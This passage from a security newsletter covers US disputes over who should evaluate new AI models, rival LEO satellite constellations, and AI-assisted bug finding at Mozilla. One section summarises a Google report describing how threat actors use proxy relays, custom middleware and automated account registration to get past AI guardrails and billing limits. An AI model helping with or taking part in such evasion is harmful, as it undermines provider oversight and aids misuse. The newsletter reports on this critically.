pre-wrap;">Unsplash</span></a></figcaption></figure><p>The Trump administration is grappling with whether to give US intelligence agencies a bigger role in the assessment of new AI models, <a href="https://www.washingtonpost.com/politics/2026/05/11/trump-ai-regulation-commerce-intelligence"><u>according to</u></a> <em>The Washington Post.</em></p><p>Ideas about AI regulation within the administration appear to be in a state of flux. <em>Politico</em> <a href="https://www.politico.com/news/2026/05/05/white-house-mulls-tight-new-controls-on-advanced-ai-00907468"><u>reported on Tuesday last week</u></a> the administration was considering a government vetting process before new models were released. By Thursday, the <a href="https://www.politico.com/news/2026/05/07/white-house-ai-oversight-00910837"><u>administration was distancing itself</u></a> from tighter regulation, and by Friday <a href="https://www.politico.com/news/2026/05/08/trump-white-house-ai-confusion-00913092"><u>a lobbyist told <em>Politico</em></u></a><em> </em>that &quot;there is no clarity&quot; because &quot;different factions within the White House have different views about what should happen&quot;.&#xA0;</p><p>Amongst that chaos, the National Cyber Director pitched a center within the Office of the Director of National Intelligence for the evaluation of new AI models. The intelligence community has deep expertise in cyber security and AI and their associated national security risks and benefits, so that does make a lot of sense.</p><p>Meanwhile, the Department of Commerce is already home to the <a href="https://www.nist.gov/caisi"><u>Center for AI Standards and Innovation</u></a> (CAISI). The Center was spun up as the US AI Safety Institute in 2024 before being renamed last year, and it has a head start building the expertise and infrastructure in testing and evaluating models.&#xA0;</p><p>But on Friday CAISI took down a web site that announced <a href="https://www.washingtonpost.com/technology/2026/05/05/google-microsoft-xai-ai-review/"><u>new voluntary agreements</u></a> with Google, Microsoft and xAI for it to test models before their release because of what the <em>Washington Post</em> describes as &quot;sensitivity&quot; from the White House. The <em>Post&apos;s</em> sources went on to describe the conflict between Commerce and national security aides as a &quot;knife fight&quot;.&#xA0;</p><p>Of course, AI is about more than just cyber security and potentially has serious implications across the entire economy. There is no single government agency that contains all the expertise that is needed to review models. For example, AI companies are concerned about the <a href="https://deploymentsafety.openai.com/gpt-5-5/biological-and-chemical"><u>biological and chemical capabilities</u></a> of models and whether they could be used to assist in the creation of weapons of mass destruction. These are serious concerns but not exactly the expertise that NSA holds.</p><p>Despite that, the intelligence community should obviously be involved in assessing models. Where the specialist expertise exists in that community, the US government should draw on it. But the intelligence community shouldn&apos;t own model assessment entirely. AI&apos;s implications are simply too wide-ranging.&#xA0;</p><h2 id="leo-satellite-constellations-are-a-must-have">LEO Satellite Constellations Are a Must Have</h2><p>Russian firm Bureau 1440 has begun launching the country&apos;s answer to Starlink, a new Low Earth Orbit (LEO) satellite constellation called Rassvet, <a href="https://www.wired.com/story/meet-rassvet-russias-answer-to-starlink/"><u>reports</u></a> <em>Wired</em>.&#xA0;</p><p>Rassvet, Russian for &apos;daybreak&apos;, will not match Starlink in many respects, but the Russian Russian government is investing billions of dollars to develop it as a sovereign capability. Rassvet&apos;s total funding is USD$5.7 billion, with the Russian Ministry of Communications reportedly providing about $1.3 billion. By comparison, Amazon has <a href="https://www.satellitetoday.com/finance/2026/02/09/amazon-expects-to-increase-spending-on-amazon-leo-by-1b-in-2026/"><u>spent more than USD$10 billion</u></a> on its satellite constellation, <a href="https://en.wikipedia.org/wiki/Amazon_Leo"><u>Amazon Leo</u></a>, which has not yet launched its commercial service.</p><p>The planned size of Rassvet&apos;s satellite constellation is <a href="https://keeptrack.space/deep-dive/russias-rassvet-constellation#:~:text=What%20sets%20these%20sixteen%20satellites,constellation%20in%20low%20Earth%20orbit."><u>far smaller</u></a> than either Leo or Starlink. Bureau 1440 is aiming for around 900 satellites by 2035, with 16 launched so far. By contrast, Amazon <a href="https://www.satellitetoday.com/finance/2026/02/09/amazon-expects-to-increase-spending-on-amazon-leo-by-1b-in-2026/"><u>says it will launch</u></a> three thousand by 2029 for Leo and Starlink currently has nine thousand <a href="https://orbitalradar.com/how-many-starlink-satellites"><u>active</u></a> satellites.</p><p>Using thousands of satellites to provide global coverage is great for providing fast internet broadband worldwide, but for Russia having a rudimentary sovereign, domestically focussed capability may be more important than having a great one.</p><p>Even though Starlink was notionally denied to Russian forces because of geoblocks and sanctions, its military was able to use it throughout the war in Ukraine until <a href="https://news.risky.biz/srsly-risky-biz-googles-cyber-disruption-unit-kicks-its-first-goal/#spacex-says-nyet-to-russian-drones"><u>SpaceX began allowlisting Ukrainian terminals</u></a> earlier this year. The countermeasure was prompted by Russia using Starlink terminals to <a href="https://understandingwar.org/research/russia-ukraine/russian-offensive-campaign-assessment-january-29-2026/"><u>control long-range drone strikes</u></a> deep within Ukrainian territory. This allowlisting control had an <a href="https://www.theguardian.com/world/2026/feb/09/russia-scrambles-starlink-access-deactivated-elon-musk-space-x"><u>immediate impact</u></a> on Russian effectiveness and left its military <a href="https://news.risky.biz/srsly-risky-biz-americas-next-top-cyber-model/#war-runs-on-wireless"><u>searching for ground-based alternatives</u></a> such as long-range Wifi bridges.&#xA0;&#xA0;</p><p>Even a relatively small constellation of LEO satellites could provide some military users in occupied Ukraine with high-bandwidth low-latency links, albeit intermittently throughout the day. Bureau 1440&apos;s already achieves 48 Mbit/s downlinks and 12 Mbit/s uplinks at around 40 milliseconds latency. Specialist space publication <em>KeepTrack</em> says <a href="https://keeptrack.space/deep-dive/russias-rassvet-constellation#:~:text=Actual%20test%20results,technology%20is%20sound."><u>this is roughly equivalent</u></a> to early Starlink capacity before its constellation was built out, suggesting that the underlying communications technology is sound.&#xA0;&#xA0;</p><p>Beyond potential military application in Ukraine, Rassvet is optimised for high-latitude coverage and will do a far better job than Starlink of servicing northern Russia.&#xA0;</p><p>It seems that the biggest hurdle for Rassvet, however, is Russia&apos;s limited launch capacity, which is running at just 20 launches per year for all customers.&#xA0;</p><p>China, by contrast, is launching <em>two</em> satellite constellations: Guowang, &apos;State Network&apos;, is a state-backed initiative and Qianfan or &apos;Thousand Sails&apos; is a commercial-first system. Each constellation is planned to consist of almost 13,000 satellites and at the end of 2025 about 400 satellites were in orbit between the two systems.&#xA0;</p><p>That&apos;s a lot of satellites still to go, but China <a href="https://keeptrack.space/deep-dive/china-launch-cadence-2025-2026#:~:text=The%20Two%20Constellations%20That%20Eat,12%2C992"><u>isn&apos;t launch constrained</u></a> in the way that Russia is. This year, it is on track for 140-odd launches and by March it had successfully launched 34 orbital missions. This compares to the US&apos;s 29, of which SpaceX alone was responsible for 22.</p><p>To date, China has used single-use rockets to build out its launch capability, but its companies are working on reusable rockets now. Its single-use launches aren&apos;t as reliable or as safe from a space debris perspective as American and European ones, but they&apos;re getting the job done until reusable rockets come online.</p><p>The European Union, meanwhile, <a href="https://defence-industry-space.ec.europa.eu/eu-space/iris2-secure-connectivity_en"><u>is developing IRIS</u></a>, a smaller constellation that occupies a combination of low and medium earth orbits. The idea is it will achieve good coverage and speeds at lower costs, with the trade off being less overall capacity and higher latency at times.&#xA0;</p><p>IRIS is under development, but in the short term the Anglo-French Eutelsat OneWeb LEO constellation is a sovereign option for European governments that are looking for space internet. The OneWeb network currently has 630 satellites in orbit, making it the second-most mature LEO satellite constellation after Starlink. OneWeb will eventually be rolled into IRIS as the foundational LEO portion of the network.&#xA0;&#xA0;&#xA0;</p><p>Compared to Starlink, OneWeb is more expensive and slower, but perhaps that&apos;s just the price of sovereign capability. In 2025 <a href="https://www.reuters.com/business/media-telecom/germany-funds-eutelsat-internet-ukraine-musk-tensions-rise-2025-04-04/"><u>the German government revealed</u></a> it had been funding Ukrainian access to OneWeb. At that time, even Eutelsat&apos;s chief executive Eva Berneke told <em>Reuters </em>that access to OneWeb was more about having a plan B than replacing Starlink. The shakiness of the transatlantic alliance has shown us that having a plan B is important.</p><p>The funny thing about all this is that the LEO space internet race wasn&apos;t a geopolitical competition <a href="https://www.nasa.gov/history/the-decision-to-go-to-the-moon/"><u>kicked off by a Presidential pronouncement</u></a>. It was kicked off by Elon Musk wanting to launch lots and lots of rockets to <a href="https://en.wikipedia.org/wiki/SpaceX_Mars_Colonization_Program"><u>occupy Mars</u></a>. Now everyone needs their own constellation. It&apos;s a funny old world.</p><h2 id="ai-is-industrialising-cyber-threats">AI Is &quot;Industrialising&quot; Cyber Threats</h2><p>Google&apos;s <a href="https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access?e=48754805"><u>latest AI threat tracker</u></a> report details how threat actors are industrialising and scaling anonymous access to premium tier models to enable large-scale misuse.</p><p>In other words, even though AI companies try to prevent abuse, threat actors have developed an entire ecosystem to bypass safeguards and take advantage of free trials.&#xA0;</p><p>In our view, this is the most significant section of Google&apos;s report from a national security perspective.&#xA0;</p><p>Both state-sponsored and cyber crime groups are using &quot;emerging ecosystem of custom middleware, proxy relays, and automated registration pipelines designed to bypass safety guardrails and billing constraints&quot;. The idea is that by using these techniques they can maintain anonymous access to premium model tiers to &quot;effectively industrialise their adversarial workflows&quot;.&#xA0;</p><p>That doesn&apos;t sound good at all! To add insult to injury, the threat actors are actually subsidised as their abuse techniques involve cycling through new accounts. They&apos;re continually taking advantage of new free trial periods!&#xA0;</p><p>Google isn&apos;t explicit about how effective these techniques are, but it concerns us that advanced adversaries are successfully using the latest models for malicious purposes. This could include directly malicious uses such as enhancing cyber attacks, or could involve distilling advanced models. Either way, not great!</p><p>This is an area where the government should bring the AI companies together to try to understand the extent and success of these safety guardrail bypasses, develop best practices and countermeasures and perhaps even run disruption operations.&#xA0;</p><p>Without government involvement we are a bit worried that companies will portray AI guardrails as strong and robust while pushing models out to collect more revenue. OpenAI&apos;s <a href="https://openai.com/index/gpt-5-5-with-trusted-access-for-cyber/"><u>Trusted Access approach</u></a> for allowing access to GPT5.5, its latest model, <em>sounds </em>pretty good. But is it effective against the guardrail bypass ecosystem that Google describes?</p><p>Google&apos;s report also describes all the other ways that threat actors are experimenting with AI and doing dumb or clever stuff. Experimenting is to be expected. But bypassing guardrails at scale? That needs a closer look.&#xA0;&#xA0;</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/hu6lW4DSyGY?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: The AI Regulation Knife Fight"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Linux kernel killswitch proposed:</strong> This <a href="https://lore.kernel.org/all/20260507070547.2268452-1-sashal@kernel.org/"><u>proposed new security feature</u></a> would allow admins to disable vulnerable kernel functions until patches are available. It comes in the wake of two local privilege escalation vulnerabilities in the past weeks, <a href="https://www.theregister.com/security/2026/05/08/dirty-frag-linux-flaw-one-ups-copyfail-with-no-patches-and-public-root-exploit/5237230"><u>Copy Fail and Dirty Frag</u></a>. We don&apos;t know if this feature will make it into Linux, but we like that it has the potential to mitigate many vulnerabilities.&#xA0;</li><li><strong>Intrusion Logging for Android:</strong> Google <a href="https://blog.google/security/whats-new-in-android-security-privacy-2026/"><u>announced a range</u></a> of improved security and privacy protections for Android, including what it is calling &quot;Intrusion Logging&quot;. This turns on security logs that are designed to provide forensic data to analyse suspected device compromise. Amnesty International&apos;s security lab has <a href="https://securitylab.amnesty.org/latest/2026/05/android-intrusion-logging-as-a-new-source-of-data-for-consensual-forensic-analysis/"><u>published a technical briefing</u></a> on the feature.&#xA0;</li><li><strong>Signal responds to phishing:</strong> Signal has <a href="https://x.com/signalapp/status/2053957236376961474?s=20"><u>added additional security warnings</u></a> and in-app confirmations to try to combat phishing on the app. These are mostly educational warnings such as pointing out that a new Signal contact&apos;s name is not verified and whether you share any groups in common.&#xA0;&#xA0;&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, Patrick Gray chats with Knocknoc CEO Adam Pointon about their Greynoise integration.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI127.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI127/&quot;&gt;Sponsored: Knocknoc built a Greynoise integration&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 10:22 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Knocknoc built a Greynoise integration&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="shorts">Shorts</h2><h3 id="how-mozilla-found-270-bugs-in-firefox">How Mozilla Found 270 Bugs in Firefox</h3><p>Mozilla has <a href="https://hacks.mozilla.org/2026/05/behind-the-scenes-hardening-firefox/"><u>published a blog post</u></a> describing how it found the 270-odd bugs it reportedly fixed in Firefox with the help of Anthropic&apos;s Mythos Preview and other AI models.&#xA0;</p><p>The key message Mozilla emphasises is that its harnesses were extremely important. They used them around models to steer, scale and stack them to &quot;generate large amounts of signal and filter out the noise&quot;.&#xA0;</p><p>Mozilla has been using these techniques for a while and says that it was able to identify an &quot;impressive amount of previously-unknown vulnerabilities which required complex reasoning over multiprocess browser engine code&quot; even using older models like Claude Opus 4.6.&#xA0;</p><p>Using these techniques, it says AI-generated security bug reports are now &quot;very good&quot;.&#xA0;</p><p>This aligns with what former Google Distinguished Engineer Niels Provos told <em>Risky Business</em> Enterprise editor James Wilson in <a href="https://risky.biz/RBFEATURES19/"><u>this interview</u></a>. The models you&apos;re using aren&apos;t necessarily the most important factor, it&apos;s how you use them.&#xA0;</p><h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss why it makes even more sense for criminal organisations to adopt AI as compared to regular businesses.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN166.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN166/&quot;&gt;Between Two Nerds: The AI-first crime gang&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 25:57 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: The AI-first crime 